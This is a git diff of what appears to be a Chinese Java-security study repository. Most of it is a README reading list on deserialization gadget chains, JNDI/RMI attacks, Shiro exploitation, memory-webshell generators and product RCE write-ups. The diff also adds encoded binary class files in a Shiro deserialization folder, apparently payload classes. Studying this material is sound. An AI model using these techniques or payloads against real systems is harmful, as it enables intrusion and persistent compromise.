diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" new file mode 100644 index 0000000..db80041 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" @@ -0,0 +1,4 @@ +package ser; + +public class Ser01 { +} diff --git a/README.md b/README.md index 850e8da..190e49d 100644 --- a/README.md +++ b/README.md @@ -16,11 +16,12 @@ - [高版本jdk下的链子](#高版本jdk下的链子) - [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) -- [SpringBoot](#SpringBoot) +- [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - [代码审计辅助工具](#代码审计辅助工具) -- [学习路线整合](#学习路线整合) +- [参考学习路线](#参考学习路线) +- [博客&公众号整理](#博客整理) - [工具推荐](#工具推荐) @@ -91,7 +92,17 @@ # JavaWeb基础 -待完善。。。 +## JavaWeb常见漏洞 + +### XXE + +[XXE外部实体注入漏洞的测试和修复——Java_xxe漏洞的两种修复方法-CSDN博客](https://blog.csdn.net/jian876601394/article/details/107610681) 列举了很多漏洞函数 + +[Java XXE漏洞原理研究 - 郑瀚 - 博客园](https://www.cnblogs.com/LittleHann/p/17776458.html) + +[一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java,但是写的很完整 + + @@ -119,14 +130,14 @@ - -
# 反序列化 +一开始可以只看CC链 + ## CC链 CC链是Java反序列化的开始,每个人都应该好好学习。 @@ -137,7 +148,13 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java 反序列化漏洞(二) - Commons Collections | 素十八](https://su18.org/post/ysoserial-su18-2/#commonscollections1) su18师傅的反序列化取经路 -=========================快速入门的话,可以只看上面的CC链========================= +=========================快速入门的话,可以只看上面的========================= + +[CC链再次挖掘-先知社区](https://xz.aliyun.com/news/14431) 可以尝试一下自己能不能找到其他类利用 + +[CC链再挖掘 | 1diot9's Blog](https://1diot9.github.io/2025/10/27/CC链再挖掘/) 基于上面的文章,着重于如何审计 + +[java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748)
@@ -149,6 +166,14 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+## 利用链探测 + +[构造java探测class反序列化gadget | 回忆飘如雪](https://gv7.me/articles/2021/construct-java-detection-class-deserialization-gadget/#0x01-背景) 实战下利用链探测,dns法,反序列化炸弹延时法 + +[Java序列化炸弹解析-CSDN博客](https://blog.csdn.net/nevermorewo/article/details/100100048) + +
+ ## 其他链子&姿势 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0,可以打二次反序列化 @@ -179,39 +204,75 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 =========================快速入门的话,可以先只看上面部分的========================= -
+## RMI、JRMP、JEP290、LDAP -## 高版本JDK绕过 +这里的目标是: -### 基于BeanFactory +1、搞清楚RMI的通信流程,搞清楚Server,Registry,Client三者互相的打法 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) +2、了解JRMP在RMI中的作用,知道它和DGC的关系 -
+3、了解两次JEP290的防护和绕过,JEP290(8u121~8u230),JEP290(>8u231) -### 其他Factory绕过 +4、了解JNDI的基本打法,包括codebase远程加载,ldap发送反序列化数据,reference本地工厂(BeanFactory为例) -[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 我这篇写的比较完整,但是不会过于全面,可以先看 -[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) +下面整理当时看的部分文章 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC +### 整合类 -[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) +[奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚,底下的参考文章也看看 -
+[基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI-先知社区](https://xz.aliyun.com/news/6675) + +[搞懂RMI、JRMP、JNDI-终结篇-先知社区](https://xz.aliyun.com/news/6860) 里面提到的文章也要看 -## 未分类 +### RMI -[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) +[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) -[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) +[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) + +[RMI-攻击方式总结-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/257452#h2-6) 有比较完整的示例代码 [MyJavaSecStudy/docs/Java安全漫谈.pdf at main · 1diot9/MyJavaSecStudy](https://github.com/1diot9/MyJavaSecStudy/blob/main/docs/Java安全漫谈.pdf) 04-06详细讲了RMI的通信过程 +### JRMP&JEP290 + +[JRMP通信攻击过程及利用介绍-先知社区](https://xz.aliyun.com/news/15240) + +[RMI-JEP290的分析与绕过-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/259059#h2-0) + +[Shiro有key但无回显利用链子-JRMP大法_shiro有key无链怎么办?-CSDN博客](https://blog.csdn.net/weixin_43264067/article/details/139626398) 可以通过jrmp进行利用链探测 + +
+ +## 高版本JDK绕过 + +### 基于反序列化 + +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 5.1.1和5.2.2有讲 + +### 基于BeanFactory + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) + +
+ +### 其他Factory绕过 + [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103) com.sun.jndi.ldap.object.trustSerialData false的绕过 -[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857) +[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 + +[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC + +[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) + +[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857)
@@ -299,10 +360,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) +payload缩短这部分内容挺多的,感觉能单独研究了。 + [Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 +[浅谈Shiro550受Tomcat Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/浅谈Shiro550受Tomcat-Header长度限制影响突破/) 这里提供了其他缩短的方法 + [终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g) + +
## shiro越权 @@ -387,6 +454,10 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+### 其他内存马 + +[Lilctf_blade_cc](https://www.n1ght.cn/2025/08/21/blade_cc/#blade内存马) blade内存马 + ### 内存马工具 [pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具|A customizable Java in-memory webshell generation tool.](https://github.com/pen4uin/java-memshell-generator) @@ -399,6 +470,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [pen4uin/java-echo-generator: 一款支持自定义的 Java 回显载荷生成工具|A customizable Java echo payload generation tool.](https://github.com/pen4uin/java-echo-generator) 回显技术的工具 +[java_linux通用回显马](https://www.n1ght.cn/2025/08/21/java_linux通用回显马/) +
@@ -455,21 +528,39 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-# SpringBoot +# 中间件相关 + +## Tomcat + +[Tomcat URL解析差异性导致的安全问题-先知社区](https://xz.aliyun.com/news/7139) + +## Resin + +[URL解析导致的鉴权绕过问题探究-Resin篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-resin/) + +# Spring系列 + +## SpringBoot [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式
-## 源码分析 +### 源码分析 [DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) +
+### URL解析差异 + +[URL解析导致的鉴权绕过问题探究-SpringSecurity篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-SpringSecurity/) + +[7. JEECG-灰盒Fuzzing](https://www.yuque.com/pmiaowu/gpy1q8/gl653fmytz1hoyev)
-## heapdump分析 +### heapdump分析 主要是jdk自带的VisualVM看jdk版本,heapdump_tools分析依赖和密码 @@ -481,15 +572,17 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-## 文件缓存机制 +### 文件缓存机制 [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) - -
+## Spring Cloud + +[Spring Cloud GateWay CVE-2025-41243 分析-先知社区](https://xz.aliyun.com/news/19006) +[CVE-2025-41243 Spring Cloud Gateway SpEL 沙箱从任意属性访问到任意文件下载 - 白帽酱の博客](https://rce.moe/2025/09/29/CVE-2025-41243/) # 工具开发/二开 @@ -551,14 +644,24 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [用友U8Cloud环境搭建 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/U8Cloud环境搭建/) +[用友U8Cloud最新前台RCE漏洞挖掘过程分享](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) + [用友U8cloud-esnserver接口RCE | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-esnserver接口RCE/) [用友U8cloud-ServiceDispacherServlet反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-ServiceDispacherServlet反序列化/) -[微信公众平台](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) - [用友U8cloud-LoginVideoServlet接口反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-LoginVideoServlet接口反序列化/) +## 契约锁 + +[契约锁电子签章系统 pdfverifier rce 前台漏洞分析(从源码分析)-先知社区](https://xz.aliyun.com/news/18520) + +[契约锁pdfverifier RCE攻防绕过史](https://mp.weixin.qq.com/s/u--mcFjhYly74q-Qg3D7jQ) + +[契约锁电子签章系统 pdfverifier 远程代码执行漏洞分析(补丁包逆向分析)-先知社区](https://xz.aliyun.com/news/18482) + +[契约锁代码审计分析_契约锁漏洞-CSDN博客](https://blog.csdn.net/baidu_25299117/article/details/139990814) +
# 代码审计辅助工具 @@ -587,6 +690,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [1. 案例-CodeQL自动化挖掘JavaSecCode](https://www.yuque.com/pmiaowu/gpy1q8/upavb10n5vnit3y3) +[使用CodeQL_n1ght进行漏洞审计思路-先知社区](https://xz.aliyun.com/news/18769) 实战审计例子,有空看看 + +[codeql带依赖jar包数据库生成](https://www.n1ght.cn/2025/06/16/codeql带依赖jar包数据库生成/) + +[CodeQL踩坑日记and规则分享](https://mp.weixin.qq.com/s/cOXc0MyDXhslTPBENfd4Pg) + +[CodeQL分析java反序列化gadget第一期--CC1链-先知社区](https://xz.aliyun.com/news/18578) + +[聊一聊 CodeQL 基础之过河问题](https://mp.weixin.qq.com/s/CCwWUrRa0K_hcBYEaAe8xQ) + [利用Github Actions生成CodeQL数据库 -- 以AliyunCTF2024 Chain17的反序列化链挖掘为例 - KingBridge - 博客园](https://www.cnblogs.com/kingbridge/articles/18100619) [aliyun ctf chain17 回顾(超详细解读)-先知社区](https://xz.aliyun.com/news/16179) @@ -611,7 +724,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# 学习路线整合 +# 参考学习路线 这里是其他师傅整理的学习路线,我这里仅列举了我看过的一些,如果有其他推荐的,可以私聊我 @@ -631,25 +744,37 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-# 博客&公众号整理 +# 博客&公众号整理 -整理一些我经常看的博客和公众号,仅根据个人主观收录,可能有很多其他优秀的没收录 +整理一些我经常看的博客和公众号。由于个人见识有些,可能有很多其他优秀的博客和公众号没收录 ## 博客 -[Archives | Bmth's blog](http://www.bmth666.cn/archives/) +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) -[Y4tacker:Hacking The World!](https://y4tacker.github.io/) +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) +[All Posts - X1r0z Blog](https://exp10it.io/posts/) +[Jasper_sec](https://jaspersec.top/) +[真爱和自由 的个人主页-先知社区](https://xz.aliyun.com/users/141946/news) +[Archives - Boogiepop Doesn't Laugh](https://boogipop.com/archives/) + +
## 公众号 漫漫安全路 +珂技知识分享 里面还有pwn入门文章 + +菜狗安全 +Heihu Share + +
# 工具推荐 diff --git a/shiro/.idea/shiro.iml b/shiro/.idea/shiro.iml new file mode 100644 index 0000000..79c6a37 --- /dev/null +++ b/shiro/.idea/shiro.iml @@ -0,0 +1,16 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/shiro/python/.idea/python.iml b/shiro/python/.idea/python.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/shiro/python/.idea/python.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file 
diff --git a/shiro/shiroDeser/BadInterceptor_within.class b/shiro/shiroDeser/BadInterceptor_within.class new file mode 100644 index 0000000000000000000000000000000000000000..9fc38250ff0646cbf90c6d3b1d0dfcae23a38945 GIT binary patch literal 11812 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 literal 0 HcmV?d00001 
diff --git a/shiro/shiroDeser/Calc.class b/shiro/shiroDeser/Calc.class new file mode 100644 index 0000000000000000000000000000000000000000..8580c8fd714d9cde610804b9847d748c47077bc0 GIT binary patch literal 742 zcmZuuO>fgc6r4>$)-eu^Q<6doltQ6NE0GJgR9q^M5QZXB1##TCOS-LVM~(x%@@qJA zp$H_n^P_-SCrWd`l6U=P-+a9F??2yv0(gvF7cN>Z)^W?hZM)x**pRsEqKr)k_ayF1 zYzdV2Ol-0z0>yS`AW+&*jOm5!XrNMK>p3WR&CQ{m}LHO{%Y{f2VVp**n0U0Nm9;+ieF4Y8T zmz0Cyi4HRX{}P(32)HAiEs93FGn;(b$kC^; zY_8!7o3F9C#UBr1CGJ%U*C64;A?{*@CrwKFIqs87an!NO{W{+o3V*o>iH2R874p^= zao*FxGS+MqXCCE+jlz7hD4?*nh|=U27^*@;kLEUJlXf=7Y(^W;XJySL3PJA4t72Ke F&3~KVkJA7E literal 0 HcmV?d00001 
diff --git a/shiro/shiroDeser/SimpleInterceptor.class b/shiro/shiroDeser/SimpleInterceptor.class new file mode 100644 index 0000000000000000000000000000000000000000..7a9bf298a03dc498df69f985d03e31c14e57c4a8 GIT binary patch literal 4750 zcmbtX>3E<5V;UTx{Rb}JTRJ3W=7bg zO_wB1o6voy>E1MSNf**qKxk6Br7hj}{r~6(er?a28OgGdBieq@)69GK-gn=*=iPhf z>c5_Q0l@9}M+&#WNuh)Xl5kt$!B6|_b2fI z`Ts!`A5!t*BtDYFM^os)$C5ak#K%=UDc?Sk!YA>m6gK12Nqk2Be^w5klf&ob@Kg$4 zz|(R#Cx@q0d{M=h6fD?j+NQrtL9BDjVFmF)ryvw8$(XhnEf;gb9W!zkXVMubZ&-&7 z*Oc$kq?&hZUrhT7?#MXqaosDqrhRVs5+F`C zku&tJvraneOVIme^c4D*zJ5u;!jdaOd=(Tz^{EDp1|fjDpQg4TbwDNV+1lsi3)&(eB(S;=$~*N3M|JQ?AL-)?#Wp z`avS*9|@+3F$WO+vD*}0r{Ppk#$d?qXu3I|jI(gxFd&;I&5H2@S z9RBj8TPPF|E1NfLo2$In!R>yMf#OxLy$Q!HDsVdknt5egmzT>Z8Tm<}PaCAMPXC2# z82GCprOO{2o(IHJ~TEmFl~Cn1km7R?{BJfL$FDTNplLeH#OME z3k3sB^_n?C0%x5vlh{5}rtG%sl2fltgBrGDhl;Ogcm`ipa3{IdJ124XGI95EH<@L7 zhfJ?z_@tgo(gZVu2S&&C-Z!S=YZ|_eZ}7y+ixPXfqF5x*|!=NC{PVcM}^QLtP+C3UB<2x#z*YEPA83sU;T`-`DU1{E($0&vL8cM;czlk2M^@xB@UEIbN^L zBC6pha{8yZ%E~ik+8Ta_pDS23Q_W`Q83jvcmcqIq(_697E2c?^7CkS|@e9uBIn&m? 
zNzU~!Dcv-KMwF8@{1U%X@oNpg!EdF~?N5U!C)-2=^QR?s~k8gC}>OQq_DA+mQhSlaJ;;9~$ z#;AMQ@5toNc;w5j%aj?d4*0Cdxw0>q2=D6LGH)9*kMS9GmJNA3U$U*54Vs4Gs22(NS*w^T7550kR)|`)xLoDOc+JRD$FUfr+L+6PwZO~OnIE<{S=!39wY2d6s#nH0vM`xYi-NM zX6AyfDx|?dL-yoB7t}1IQ9G%im0mEtl!WV_=9}+ioGIZB8Xhyr@~T$>acU|_Nom8B z-P4--SPxDbEFSd7&WnE89JX~Hs|!e^FC&=ne8ZI(&)Oi$a>O{yRKc#%q=LnCbl5JH z{V)=#o4=giXF7FoBDD7mSPVE`Q6NOVTez_ zUj8&{hEn?|^(xLRMa#drjiO?|9EN3aWFh8AY-pcFiT??S&3Qhw1V=~(lN)JbQ{Y-# zC=_i(al9HCswx=4DA%N^M}wXR+ZjI>r|~j}7Co^vkm2@$@a(@kDp_0&eY# zpToMk)s1p>)6D8+Y#whXUpgz;asgfGtrc{WCuB*_S+vUkUXr9|R6gljdn$N2C0@bb zHVJmDjxV>-?c1R;dMgR%c7kz`JeVK{rWvJ&$bg5*fyWsCCm3zXm;IF9MjJ*RWBAv77Jz zB)ave=8%sfes^#L5^9Dx^5#j;q<~Jl8UJ0+cqGemos6?h(zFR(GIo*?r3;B2(mHmEO~y{hxCu_uf-K7(B^qfe zX%eUGOAC~JD=lST8g|Ib)CW#;c;*3Kc;$&Fc;P>w{H`Q>G;}x#2cP4sd%yeb-|zdR z`QyKScMHHHxT)a~E@^lg&&cKdDn6jW#F7e2!LkMgwt^K6tEj7RR9seZMTM)PD(@O9 zJQZ^ae96&NaazT*8UlnGMi8lJ$>&uS*Ho;jxUOLU&#CyJf)8o@We?nj&3QR9t@q>myP_9~j!w6fR;RmaR z*)*-XZLFED=^2g}*@0)e##-n`mN9*LZsKB3?uOgp4Q+bhI?vgGQA@XG6bmwl_%u)Rp&a8HH*%{)cxi5^CE;{SI>Ks&i+*-hzSsNiz~TjuPj?k}G)1G8Z> zeA;>Ke@ju%fU+4{jvB`F!rbJV6VB3t8TrA)ZH4YAtxl>=;L+PE?B#`klBQQ+^0pdo z=Msx`%yLuo3QJ&X^|E=@GzhI#W6CwdkXRJN;O-1Puvc8$ij1TTlEIhQ?g*YC+szs)CWzKBIt;H#!;Padj90Cf?vR?_Mn%@d6`$t>i8PI zF0hSZryP?J<5_A&Hp3Y1`Qpq@Ud=oDVJaMP~u(7YYJ&g{=zJyJ- z6O*8IJQLU}4X;&*8Yx@Z)R8djctv{mKsQr8ikg)fE}PtOLb{?zDx~9Ec$N6|!-~gL zD)_dJ@8G*SzK8DKQ8AVr&j{;09=3G+2tOuG79w&z;xtZCD{@?; zW|^KRll>DNui=J{pWf+XH#&YRP4%z1EvdNQa($VDkxsrh zM~%eF=0IlN?{oqOEiZB!wlTRBa)evaf}G<_rohoVRk0zG@nu)X!|v|uO7lWJU^@v6 